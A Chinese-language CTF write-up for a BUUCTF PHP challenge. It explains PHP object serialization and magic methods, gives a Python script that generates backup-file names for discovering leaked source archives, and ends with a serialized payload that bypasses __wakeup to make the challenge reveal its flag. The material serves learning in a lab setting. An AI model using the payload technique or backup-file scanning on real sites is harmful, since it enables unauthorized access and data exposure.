buuctf php

知识点

php反序列化漏洞

1、原理

序列化过程:将一个对象转化为字符串的过程(将会执行__sleep() 魔术方法)
反序列化:将字符串还原成对象的过程(将会执行__wakeup() 魔术方法)

序列化属性不同时输入的格式不同:

private属性序列化的时候格式是 %00类名%00成员名 如%00test%00name (test->类名name->成员名)
protected属性序列化的时候格式是 %00*%00成员名 如%00*%00name (name->成员名)

原理:

protected声明的字段为保护字段,在所声明的类和该类的子类中可见,但在该类的对象实例中不可见。因此保护字段的字段名在序列化时,字段名前面会加上\0*\0的前缀。这里的 \0 表示 ASCII 码为 0 的字符(不可见字符),而不是 \0 组合。这也许解释了,为什么如果直接在网址上,传递\0*\0username会报错,因为实际上并不是\0,只是用它来代替ASCII值为0的字符。必须用python传值才可以。
private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上\0的前缀。字符串长度也包括所加前缀的长度。其中 \0 字符也是计算长度的。

 2、php魔法函数

到目前为止,我们可以控制类属性,但还称不上漏洞,只能说是反序列化的特性,还要配合上特定函数才能发挥反序列化漏洞的威力。所以要先了解一些特殊的函数——魔术方法,这些魔术方法均可以在一些特定的情况下自动触发。如果这些魔术方法中存在我们想要执行,或者说可以利用的函数,那我们就能够进一步进行攻击。
 

常见函数:

__construct():构造函数,此函数会在创建一个类的实例时自动调用(当一个对象创建时被调用)。

__destruct():析构函数,此函数会在对象的所有引用都被删除或者类被销毁的时候自动调用(当一个对象销毁时被调用)。

__sleep():执行serialize()函数之前,会检查类中是否存在_sleep()方法。如果存在,该方法会先被调用。

__wakeup():执行unserialize()函数之前,会检查类中是否存在_wakeup()方法。如果存在,则会先调用_wakeup()方法,预先准备对象需要的资源。

__toString():当一个对象被当作一个字符串使用时被调用。例如echo $obj或者拼接字符串时;此方法必须返回一个字符串,否则会产生 E_RECOVERABLE_ERROR 级别的错误。

__get():在读取不可访问的属性值的时候,此魔法函数会自动调用。

__call():在调用未定义的方法时被调用。

题目

打开之后得到一个好玩的界面

根据提示应该是这个网址之中藏着文件或其他网址这里有两种选择

1、御剑直接扫描 

 2、用python

这是我在网上找的大佬的备份文件url生成字典脚本

import os
import os.path
import requests
from urllib.parse import unquote

suffixList = ['.rar','.zip','.tar','.tar.gz']
keyList = ['www','wwwroot','site','web','website','backup','data','mdb','WWW','新建文件夹','ceshi','databak',
'db','database','sql','bf','备份','1','2','11','111','a','123','test','admin','app','bbs','htdocs','wangzhan']

def run(url):
    num1 = url.find('.')
    num2 = url.find('.', num1 + 1)
    keyList.append(url[num1 + 1:num2])
    keyList.append(url) 
    keyList.append(url.replace('.', '_'))  
    keyList.append(url.replace('.', '')) 
    keyList.append(url[num1 + 1:]) 
    keyList.append(url[num1 + 1:].replace('.', '_'))  
#用法 python3 bfuzz.py www.baidu.com        
url ="http://39704bbc-7195-41ac-a563-dd4bd202da9c.node3.buuoj.cn/"
run(url)

tempList = []

for key in keyList:
    for suff in suffixList:
        tempList.append(key + suff)
fobj = open("result.txt" , 'w')
for each in tempList:
    fobj.write('%s%s' % (each,'\n'))
    fobj.flush()

之后得到一串php代码:

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

对这串代码进行分析发现当username=admin&password =100时即可得到flag

这里要注意index.php代码中的部分       

<?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
    ?>

发现有select函数,因此反序列化时必须绕过_wakeup(),否则,username将会变成guest

开始构造pyload:

select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

得到flag

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值